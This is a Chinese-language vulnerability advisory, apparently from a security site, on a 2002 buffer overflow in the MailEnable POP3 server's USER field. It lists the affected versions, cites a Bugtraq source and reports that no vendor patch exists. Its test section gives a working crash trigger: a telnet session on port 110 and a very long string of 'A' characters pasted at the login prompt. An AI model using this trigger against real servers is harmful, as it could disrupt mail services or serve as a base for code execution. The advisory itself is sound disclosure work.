MailEnable Email Server远程缓冲区溢出漏洞
发布日期:2002-11-18
更新日期:2002-11-25
受影响系统:MailEnable MailEnable 1.5018
MailEnable MailEnable 1.5017
MailEnable MailEnable 1.5016
MailEnable MailEnable 1.5015
描述:
BUGTRAQ ID:
6197
MailEnable是一款基于WEB的邮件服务程序。
MailEnable POP3服务器对用户登录字段数据缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以POP3进程权限在系统上执行任意指令。
攻击者可以连接有此漏洞的MailEnable POP3服务程序,并在USER提示字段输入超长的字符串,可触发缓冲区溢出,精心构建提交数据可能以POP3进程权限在系统上执行任意指令。
<*来源:Ketil Braun Larsen (
htx01i12@it-college.dk)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103767041520242&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Ketil Braun Larsen (
htx01i12@it-college.dk)提供了如下测试方法:
#telnet xxx.xxx.xxx.xxx 110
(clear screen)
+OK Welcome to MailEnable POP3 Server
(然后拷贝粘贴如下内容-
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
建议:
厂商补丁:
MailEnable
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mailenable.com/浏览次数:2855
严重程度:0(网友投票)